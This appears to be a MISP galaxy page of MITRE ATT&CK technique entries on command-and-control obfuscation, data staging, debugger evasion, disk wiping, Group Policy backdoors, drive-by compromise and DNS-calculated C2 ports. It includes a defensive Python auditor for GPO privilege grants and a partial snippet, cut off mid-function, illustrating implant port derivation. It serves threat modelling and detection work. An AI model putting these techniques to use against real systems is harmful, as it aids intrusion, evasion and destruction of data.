platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Junk Data

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.

Internal MISP references

UUID 584d1c76-7da9-4374-87df-e622d78fc270 which can be used as unique global reference for Junk Data in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1001.001
Related clusters

To see the related clusters, click here.

Protocol Impersonation

Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.

Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related to a trusted entity.

Internal MISP references

UUID eb15320a-cd24-45b2-b23f-05ef8daf1039 which can be used as unique global reference for Protocol Impersonation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1001.003
Related clusters

To see the related clusters, click here.

Steganography - Duplicate

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

Internal MISP references

UUID 2735f8d1-0e46-4cd7-bfbb-78941bb266fd which can be used as unique global reference for Steganography - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1001.002
Related clusters

To see the related clusters, click here.

Data Obfuscation

Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.

Internal MISP references

UUID 57f95410-5735-43ae-9fec-8b628a7df985 which can be used as unique global reference for Data Obfuscation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Local Data Staging

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.[Prevailion DarkWatchman 2021]

Internal MISP references

UUID 8e32b6ed-58b1-4708-8b86-bd29c3a544d2 which can be used as unique global reference for Local Data Staging in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1074.001
Related clusters

To see the related clusters, click here.

Remote Data Staging

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[Mandiant M-Trends 2020]

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

Internal MISP references

UUID cf76b79c-8226-4137-b3dd-8f516611b928 which can be used as unique global reference for Remote Data Staging in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1074.002
Related clusters

To see the related clusters, click here.

Data Staged

Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.[PWC Cloud Hopper April 2017]

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[Mandiant M-Trends 2020]

Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.

Internal MISP references

UUID ef4ef020-5cd1-4859-902b-f207828a1281 which can be used as unique global reference for Data Staged in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Transfer Size Limits

An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.

Internal MISP references

UUID dc98c882-8fba-4a10-bc6f-43088edb87af which can be used as unique global reference for Data Transfer Size Limits in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Debugger Evasion

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.[ProcessHacker Github]

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to Virtualization/Sandbox Evasion, if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve Native API function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements of whether exceptions are raised in the current process (assuming a present debugger would "swallow" or handle the potential error).[hasherezade debug][AlKhaser Debug][vxunderground debug]

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping Native API function calls such as OutputDebugStringW().[wardle evilquest partii][Checkpoint Dridex Jan 2021]

Internal MISP references

UUID 945c1564-6c13-4baa-b1d4-6ba82e06a897 which can be used as unique global reference for Debugger Evasion in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

External Defacement

An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. External Defacement may ultimately cause users to distrust the systems and to question/discredit the system's integrity. Externally-facing websites are a common victim of defacement, often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.[FireEye Cyber Threats to Media Industries][Kevin Mandia Statement to US Senate Committee on Intelligence][Anonymous Hackers Deface Russian Govt Site] External Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as Drive-by Compromise.[Trend Micro Deep Dive Into Defacement]

Internal MISP references

UUID 26db57d5-ce6f-4487-a8a8-b4af1c4b6406 which can be used as unique global reference for External Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1491.002
Related clusters

To see the related clusters, click here.

Internal Defacement

An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.[Novetta Blockbuster] Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.[Novetta Blockbuster Destructive Malware]

Internal MISP references

UUID 546a3318-0e03-4b22-95f5-c02ff69a4ebf which can be used as unique global reference for Internal Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1491.001
Related clusters

To see the related clusters, click here.

Defacement

Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.

Internal MISP references

UUID 9a21c7c7-cf8e-4f05-b196-86ec39653e3b which can be used as unique global reference for Defacement in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Deobfuscate/Decode Files or Information

Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or the use of utilities present on the system.

One such example is the use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.[Malwarebytes Targeted Attack against Saudi Arabia] Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.[Carbon Black Obfuscation Sept 2016]

Sometimes a user's action may be required to open the file for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password-protected compressed/encrypted file that was provided by the adversary.[Volexity PowerDuke November 2016]

Internal MISP references

UUID 88c2fb46-877a-4005-8425-7639d0da1920 which can be used as unique global reference for Deobfuscate/Decode Files or Information in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Deploy Container

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.[Docker Containers API][Kubernetes Dashboard][Kubeflow Pipelines] Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.[Aqua Build Images on Hosts]

Internal MISP references

UUID 2618638c-f6bd-4840-a297-c45076e094a9 which can be used as unique global reference for Deploy Container in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers']
source MITRE
Related clusters

To see the related clusters, click here.

Code Signing Certificates - Duplicate

Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.[Wikipedia Code Signing] Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.

Prior to Code Signing, adversaries may develop self-signed code signing certificates for use in operations.

Internal MISP references

UUID 6f152555-36a5-4ec9-8b9b-f0b32c3ccef8 which can be used as unique global reference for Code Signing Certificates - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.002
Related clusters

To see the related clusters, click here.

Digital Certificates - Duplicate

Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).

Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if added to the root of trust (i.e. Install Root Certificate).

After creating a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.

Internal MISP references

UUID 5bcbb0c5-7061-481f-a677-09028a6c59f7 which can be used as unique global reference for Digital Certificates - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.003
Related clusters

To see the related clusters, click here.

Exploits - Duplicate

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding or modifying exploits found online or purchasing them from exploit vendors, an adversary may develop their own exploits.[NYTStuxnet] Adversaries may use information acquired via Vulnerabilities to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.[Irongeek Sims BSides 2017]

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. Exploit Public-Facing Application, Exploitation for Client Execution, Exploitation for Privilege Escalation, Exploitation for Defense Evasion, Exploitation for Credential Access, Exploitation of Remote Services, and Application or System Exploitation).

Internal MISP references

UUID 5a57d258-0b23-431b-b50e-3150d2c0e52c which can be used as unique global reference for Exploits - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.004
Related clusters

To see the related clusters, click here.

Malware - Duplicate

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.[Mandiant APT1][Kaspersky Sofacy][ActiveMalwareEnergy][FBI Flash FIN7 USB]

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed to communicate with Twitter for C2 may require use of Web Services.[FireEye APT29]

Internal MISP references

UUID 0f77a14a-d450-4885-b81f-23eeffa53a7e which can be used as unique global reference for Malware - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1587.001

Develop Capabilities

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.[Mandiant APT1][Kaspersky Sofacy][Bitdefender StrongPity June 2020][Talos Promethium June 2020]

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

Internal MISP references

UUID bf660248-2098-499b-b90c-8c47efb26c70 which can be used as unique global reference for Develop Capabilities in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Device Driver Discovery

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. Security Software Discovery) or other defenses (e.g., Virtualization/Sandbox Evasion), as well as potential exploitable vulnerabilities (e.g., Exploitation for Privilege Escalation).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.[Microsoft Driverquery][Microsoft EnumDeviceDrivers] Information about device drivers (as well as associated services, i.e., System Service Discovery) may also be available in the Registry.[Microsoft Registry Drivers]

On Linux and macOS, device drivers take the form of kernel modules; the device nodes they expose are visible under /dev, and on Linux the loaded modules can be listed and inspected with utilities such as lsmod and modinfo.[Linux Kernel Programming][lsmod man][modinfo man]

Internal MISP references

UUID 70ffc700-eb9b-54d7-8fd4-564bd71a6434 which can be used as unique global reference for Device Driver Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE

Direct Volume Access

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. [Hakobyan 2009]

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell.[Github PowerSploit Ninjacopy] Adversaries may also use built-in or third-party utilities (such as vssadmin, wbadmin, and esentutl) to create shadow copies or backups of data from system volumes.[LOLBAS Esentutl]

Internal MISP references

UUID 447f1d32-31f7-44b5-834a-dcba8b038e7f which can be used as unique global reference for Direct Volume Access in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE

Disk Content Wipe

Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.[Novetta Blockbuster][Novetta Blockbuster Destructive Malware][DOJ Lazarus Sony 2018] Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.[Novetta Blockbuster Destructive Malware] Adversaries have also been observed leveraging third-party drivers like RawDisk to directly access disk content.[Novetta Blockbuster][Novetta Blockbuster Destructive Malware] This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Novetta Blockbuster Destructive Malware]

Internal MISP references

UUID 761fa7fa-d7e1-4796-85b3-5cd37d55dffa which can be used as unique global reference for Disk Content Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1561.001

Disk Structure Wipe

Adversaries may corrupt or wipe the disk data structures on a hard drive that are necessary to boot a system, targeting specific critical systems or large numbers of systems in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018] The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.

On network devices, adversaries may reformat the file system using Network Device CLI commands such as format.[format_cmd_cisco]

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017]

Internal MISP references

UUID 14a944d3-ab95-40d8-b069-ccc4824ef46d which can be used as unique global reference for Disk Structure Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1561.002

Disk Wipe

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Novetta Blockbuster Destructive Malware]

On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as erase.[erase_cmd_cisco]

Internal MISP references

UUID ea2b3980-05fd-41a3-8ab9-3106e833c821 which can be used as unique global reference for Disk Wipe in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE

Domain Trust Modification

Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.[Microsoft - Azure AD Federation] These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.

Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge SAML Tokens without the need to compromise the existing signing certificate: instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.[AADInternals Azure AD Federated Domain]

Internal MISP references

UUID f534b0a6-4445-409a-889c-6c3ac34656f1 which can be used as unique global reference for Domain Trust Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1484.002

Group Policy Modification

Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path, \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.[TechNet Group Policy Basics][ADSecurity GPO Persistence 2016]

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more.[ADSecurity GPO Persistence 2016][Wald0 Guide to GPOs][Harmj0y Abusing GPO Permissions][Mandiant M Trends 2016][Microsoft Hacking Team Breach] Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.[Wald0 Guide to GPOs]

For example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <GPO_PATH>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml.[Wald0 Guide to GPOs][Harmj0y Abusing GPO Permissions] In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.[Harmj0y SeEnableDelegationPrivilege Right]
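The SeEnableDelegationPrivilege backdoor above lives in a plain INI-style file, which makes it auditable. The following is an added example (not code from the page or from MITRE) that parses the [Privilege Rights] section of a GptTmpl.inf and reports sensitive user rights granted to principals outside a baseline. The sample file contents, the domain SID and the RID 1105 are constructed for this example; the baseline of BUILTIN\Administrators (S-1-5-32-544) and Backup Operators (S-1-5-32-551) is an assumption to adjust per environment.

```python
import configparser

# Constructed sample of <GPO_PATH>\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf.
# The domain SID and RID 1105 are made up. A real file is UTF-16 encoded, so read it
# with open(path, encoding="utf-16") before handing the text to parse_privilege_rights().
SAMPLE_GPTTMPL_INF = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeEnableDelegationPrivilege = *S-1-5-32-544,*S-1-5-21-1111111111-2222222222-3333333333-1105
SeDebugPrivilege = *S-1-5-32-544
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
"""

# Assumed baseline: BUILTIN\Administrators and BUILTIN\Backup Operators.
EXPECTED_HOLDERS = {"S-1-5-32-544", "S-1-5-32-551"}

# Rights whose assignment to an unexpected principal deserves a look.
SENSITIVE_RIGHTS = {
    "SeEnableDelegationPrivilege",  # control of Kerberos delegation settings
    "SeDebugPrivilege",             # open any process, including LSASS
    "SeBackupPrivilege",            # read any file regardless of its ACL
    "SeRestorePrivilege",           # write any file regardless of its ACL
    "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege",
}


def parse_privilege_rights(inf_text):
    """Return {right_name: [sid, ...]} from the [Privilege Rights] section.

    SecEdit writes SIDs with a leading '*', which is stripped here.
    """
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep the case of the right names
    parser.read_string(inf_text)
    rights = {}
    if parser.has_section("Privilege Rights"):
        for right, value in parser.items("Privilege Rights"):
            sids = [s.strip().lstrip("*") for s in value.split(",") if s.strip()]
            rights[right] = sids
    return rights


def find_unexpected_grants(rights, expected=EXPECTED_HOLDERS, sensitive=SENSITIVE_RIGHTS):
    """List (right, sid) pairs where a sensitive right is held by a principal outside the baseline."""
    findings = []
    for right, sids in rights.items():
        if right not in sensitive:
            continue
        for sid in sids:
            if sid not in expected:
                findings.append((right, sid))
    return findings


if __name__ == "__main__":
    for right, sid in find_unexpected_grants(parse_privilege_rights(SAMPLE_GPTTMPL_INF)):
        print(f"{right} granted to non-baseline principal {sid}")
```

Run this against every GptTmpl.inf under SYSVOL and resolve the reported SIDs; a domain user or group holding SeEnableDelegationPrivilege on domain controllers is the condition the text describes. Pair it with a change record check, since a legitimate delegation change and a backdoor look identical in the file itself.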

Internal MISP references

UUID 7c9035b8-ad4b-4441-be2b-823d86b54fac which can be used as unique global reference for Group Policy Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1484.001

Domain Policy Modification

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious Scheduled Task to computers throughout the domain environment[ADSecurity GPO Persistence 2016][Wald0 Guide to GPOs][Harmj0y Abusing GPO Permissions] or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks] Adversaries can also change configuration settings within the AD environment to implement a Rogue Domain Controller.

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

Internal MISP references

UUID d092a9e1-63d0-415d-8cd0-666a261be5d9 which can be used as unique global reference for Domain Policy Modification in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Windows']
source MITRE

Domain Trust Discovery

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.[Microsoft Trusts] Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.[AdSecurity Forging Trust Tickets][Harmj0y Domain Trusts] Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.[Harmj0y Domain Trusts] The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.[Microsoft Operation Wilysupply]

Internal MISP references

UUID 93bd112e-9494-4b60-bdc5-8b610c7ebe21 which can be used as unique global reference for Domain Trust Discovery in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
source MITRE

Drive-by Compromise

Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.

Multiple ways of delivering exploit code to a browser exist (i.e., Drive-by Target), including:

  • A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
  • Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
  • Malicious ads are paid for and served through legitimate ad providers (i.e., Malvertising)
  • Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to as a strategic web compromise or watering hole attack. There are several known examples of this occurring.[Shadowserver Strategic Web Compromise]

Typical drive-by compromise process:

  1. A user visits a website that is used to host the adversary controlled content.
  2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.
    • The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
  3. Upon finding a vulnerable version, exploit code is delivered to the browser.
  4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    • In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.[Volexity OceanLotus Nov 2017]

Internal MISP references

UUID d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381 which can be used as unique global reference for Drive-by Compromise in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'SaaS', 'Windows']
source MITRE

DNS Calculation

Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. An IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.[Meyers Numbered Panda]

One implementation of DNS Calculation is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.[Meyers Numbered Panda][Moran 2014][Rapid7G20Espionage]
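As an added illustration (not code from the page or from any reported sample), the block below builds a minimal DNS A response, parses it the way an implant would, and derives a port from the first three octets. The formula in derive_c2_port is a hypothetical stand-in; the page does not give the arithmetic the referenced malware used. The query name and answer address are constructed test data.

```python
import struct


def build_a_response(txn_id, qname, answer_ip, ttl=60):
    """Construct a minimal DNS response carrying one A record (test data, not a real capture)."""
    def encode_name(name):
        out = b"".join(bytes([len(label)]) + label.encode("ascii")
                       for label in name.strip(".").split("."))
        return out + b"\x00"

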